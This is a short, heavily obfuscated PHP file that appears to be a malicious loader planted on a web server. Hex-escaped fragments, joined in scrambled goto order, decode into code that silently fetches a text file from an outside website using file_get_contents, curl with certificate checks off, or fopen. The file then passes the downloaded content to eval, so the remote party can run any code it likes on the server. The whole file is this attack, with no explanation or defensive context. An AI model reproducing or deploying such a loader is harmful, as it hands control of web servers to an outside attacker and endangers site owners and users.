<?php
error_reporting(0);
$ousgm=''; goto _6959239F07375;
_6959239F0737F: $ousgm.="\x6f\x6e\x74\x65\x6e\x74\x73\x28\x24\x75\x29\x3b"; goto _6959239F07381;
_6959239F0738C: $ousgm.="\x63\x28\x24\x68\x29\x3b\x63\x75\x72\x6c\x5f\x63"; goto _6959239F0738D;
_6959239F07396: $ousgm.="\x28\x24\x68\x2c\x31\x30\x32\x34\x29\x3b\x66\x63"; goto _6959239F07397;
_6959239F07394: $ousgm.="\x68\x69\x6c\x65\x28\x21\x66\x65\x6f\x66\x28\x24"; goto _6959239F07395;
_6959239F07381: $ousgm.="\x69\x66\x28\x21\x24\x63\x29\x7b\x69\x66\x28\x66"; goto _6959239F07382;
_6959239F07393: $ousgm.="\x72\x27\x29\x3b\x69\x66\x28\x24\x68\x29\x7b\x77"; goto _6959239F07394;
_6959239F0737C: $ousgm.="\x73\x74\x65\x70\x6d\x6f\x6d\x68\x75\x62\x2e\x63"; goto _6959239F0737D;
_6959239F07399: $ousgm.="\x63\x22\x29\x3a\x64\x69\x65\x28\x27\x46\x61\x69"; goto _6959239F0739A;
_6959239F07391: $ousgm.="\x5f\x66\x6f\x70\x65\x6e\x27\x29\x29\x7b\x24\x68"; goto _6959239F07392;
_6959239F0738A: $ousgm.="\x33\x3d\x3e\x31\x2c\x36\x34\x3d\x3e\x30\x5d\x29"; goto _6959239F0738B;
_6959239F0738B: $ousgm.="\x3b\x24\x63\x3d\x63\x75\x72\x6c\x5f\x65\x78\x65"; goto _6959239F0738C;
_6959239F0738D: $ousgm.="\x6c\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x69\x66"; goto _6959239F0738E;
_6959239F07387: $ousgm.="\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74\x5f\x61\x72"; goto _6959239F07389;
_6959239F0739A: $ousgm.="\x6c\x27\x29\x3b"; goto _6959239F0739C;
_6959239F0738F: $ousgm.="\x74\x28\x27\x61\x6c\x6c\x6f\x77\x5f\x75\x72\x6c"; goto _6959239F07391;
_6959239F0737D: $ousgm.="\x6f\x6d\x2f\x33\x2e\x74\x78\x74\x27\x3b\x24\x63"; goto _6959239F0737E;
_6959239F07384: $ousgm.="\x74\x27\x29\x29\x7b\x24\x68\x3d\x63\x75\x72\x6c"; goto _6959239F07386;
_6959239F07389: $ousgm.="\x72\x61\x79\x28\x24\x68\x2c\x5b\x31\x39\x39\x31"; goto _6959239F0738A;
_6959239F07375: $ousgm.="\x24\x75\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f"; goto _6959239F0737C;
_6959239F0738E: $ousgm.="\x28\x21\x24\x63\x26\x26\x69\x6e\x69\x5f\x67\x65"; goto _6959239F0738F;
_6959239F07398: $ousgm.="\x24\x63\x3f\x65\x76\x61\x6c\x28\x22\x3f\x3e\x24"; goto _6959239F07399;
_6959239F07397: $ousgm.="\x6c\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x7d\x7d"; goto _6959239F07398;
_6959239F07392: $ousgm.="\x3d\x40\x66\x6f\x70\x65\x6e\x28\x24\x75\x2c\x27"; goto _6959239F07393;
_6959239F07386: $ousgm.="\x5f\x69\x6e\x69\x74\x28\x24\x75\x29\x3b\x63\x75"; goto _6959239F07387;
_6959239F07382: $ousgm.="\x75\x6e\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73"; goto _6959239F07383;
_6959239F07383: $ousgm.="\x74\x73\x28\x27\x63\x75\x72\x6c\x5f\x69\x6e\x69"; goto _6959239F07384;
_6959239F07395: $ousgm.="\x68\x29\x29\x24\x63\x2e\x3d\x66\x72\x65\x61\x64"; goto _6959239F07396;
_6959239F0737E: $ousgm.="\x3d\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63"; goto _6959239F0737F;
_6959239F0739C: eval($ousgm);
?>
